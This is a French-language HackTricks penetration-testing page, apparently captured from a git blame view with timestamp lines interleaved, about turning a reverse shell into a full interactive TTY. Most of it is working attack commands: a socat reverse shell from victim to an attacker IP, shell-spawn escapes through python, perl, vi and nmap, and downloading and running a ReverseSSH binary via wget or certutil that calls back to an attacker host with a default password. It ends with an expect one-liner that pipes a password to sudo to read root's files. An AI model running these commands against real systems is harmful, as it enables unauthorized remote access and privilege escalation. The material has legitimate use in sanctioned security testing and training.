hacktricks/generic-methodologies-and-resources/shells/full-ttys.md

129 lines
6.9 KiB
Markdown
Raw Normal View History

2023-06-03 13:10:46 +00:00
# TTY complet
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-06-03 13:10:46 +00:00
* Travaillez-vous dans une **entreprise de cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR au** [**repo hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**repo hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
2022-04-28 16:01:33 +00:00
</details>
2023-06-03 13:10:46 +00:00
## TTY complet
2020-08-19 11:54:25 +00:00
2023-06-03 13:10:46 +00:00
Notez que le shell que vous définissez dans la variable `SHELL` **doit** être **listé à l'intérieur** de _**/etc/shells**_ ou `The value for the SHELL variable was not found in the /etc/shells file This incident has been reported`. De plus, notez que les extraits de code suivants ne fonctionnent qu'en bash. Si vous êtes dans un zsh, passez à un bash avant d'obtenir le shell en exécutant `bash`.
2020-08-19 11:54:25 +00:00
#### Python
{% code overflow="wrap" %}
2020-08-19 11:54:25 +00:00
```bash
2021-03-10 17:37:53 +00:00
python3 -c 'import pty; pty.spawn("/bin/bash")'
2020-08-19 11:54:25 +00:00
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
```
{% endcode %}
{% hint style="info" %}
2023-06-03 13:10:46 +00:00
Vous pouvez obtenir le **nombre** de **lignes** et de **colonnes** en exécutant **`stty -a`**
{% endhint %}
2020-08-19 11:54:25 +00:00
#### script
{% code overflow="wrap" %}
2020-08-19 11:54:25 +00:00
```bash
script /dev/null -qc /bin/bash #/dev/null is to not store anything
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
2020-08-19 11:54:25 +00:00
```
{% endcode %}
#### socat
2020-08-19 11:54:25 +00:00
2023-06-03 13:10:46 +00:00
#### socat
2020-12-12 00:12:28 +00:00
```bash
#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444
#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
```
2023-06-03 13:10:46 +00:00
### **Générer des shells**
2020-08-19 11:54:25 +00:00
* `python -c 'import pty; pty.spawn("/bin/sh")'`
* `echo os.system('/bin/bash')`
* `/bin/sh -i`
* `script -qc /bin/bash /dev/null`
* `perl -e 'exec "/bin/sh";'`
* perl: `exec "/bin/sh";`
* ruby: `exec "/bin/sh"`
* lua: `os.execute('/bin/sh')`
* IRB: `exec "/bin/sh"`
* vi: `:!bash`
* vi: `:set shell=/bin/bash:shell`
* nmap: `!sh`
2022-05-08 23:13:03 +00:00
## ReverseSSH
2021-07-21 19:20:57 +00:00
2023-06-03 13:10:46 +00:00
Une façon pratique d'obtenir un accès shell interactif, ainsi que des transferts de fichiers et de la redirection de port, est de déposer le serveur ssh statiquement lié [ReverseSSH](https://github.com/Fahrj/reverse-ssh) sur la cible.
2021-07-21 19:20:57 +00:00
2023-06-03 13:10:46 +00:00
Ci-dessous un exemple pour `x86` avec des binaires compressés upx. Pour d'autres binaires, vérifiez la [page des versions](https://github.com/Fahrj/reverse-ssh/releases/latest/).
2021-07-21 19:20:57 +00:00
2023-06-03 13:10:46 +00:00
1. Préparez localement pour capturer la demande de redirection de port ssh:
2021-07-21 19:20:57 +00:00
{% code overflow="wrap" %}
2021-07-21 19:20:57 +00:00
```bash
# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
/dev/shm/reverse-ssh -v -l -p 4444
2021-07-21 19:20:57 +00:00
```
{% endcode %}
2021-07-21 19:20:57 +00:00
2023-06-03 13:10:46 +00:00
* (2a) Cible Linux:
2021-07-21 19:20:57 +00:00
{% code overflow="wrap" %}
2021-07-21 19:20:57 +00:00
```bash
# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
/dev/shm/reverse-ssh -p 4444 kali@10.0.0.2
```
{% endcode %}
2021-07-21 19:20:57 +00:00
2023-06-03 13:10:46 +00:00
* (2b) Cible Windows 10 (pour les versions antérieures, vérifiez le [lisez-moi du projet](https://github.com/Fahrj/reverse-ssh#features)):
2021-07-21 19:20:57 +00:00
{% code overflow="wrap" %}
```bash
2021-07-21 19:20:57 +00:00
# Drop it via your preferred way, e.g.
certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe
reverse-ssh.exe -p 4444 kali@10.0.0.2
```
2023-06-03 13:10:46 +00:00
* Si la demande de transfert de port ReverseSSH a réussi, vous devriez maintenant pouvoir vous connecter avec le mot de passe par défaut `letmeinbrudipls` dans le contexte de l'utilisateur exécutant `reverse-ssh(.exe)` :
2021-07-21 19:20:57 +00:00
```bash
# Interactive shell access
ssh -p 8888 127.0.0.1
# Bidirectional file transfer
sftp -P 8888 127.0.0.1
```
2023-06-03 13:10:46 +00:00
## Pas de TTY
2021-07-21 19:20:57 +00:00
2023-06-03 13:10:46 +00:00
Si pour une raison quelconque vous ne pouvez pas obtenir un TTY complet, vous **pouvez toujours interagir avec les programmes** qui attendent une entrée utilisateur. Dans l'exemple suivant, le mot de passe est passé à `sudo` pour lire un fichier :
2020-08-19 11:54:25 +00:00
```bash
expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
```
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-06-03 13:10:46 +00:00
* Travaillez-vous dans une entreprise de **cybersécurité** ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) **groupe Discord** ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-moi** sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live).
* **Partagez vos astuces de piratage en soumettant des PR au** [**repo hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**repo hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
2022-04-28 16:01:33 +00:00
</details>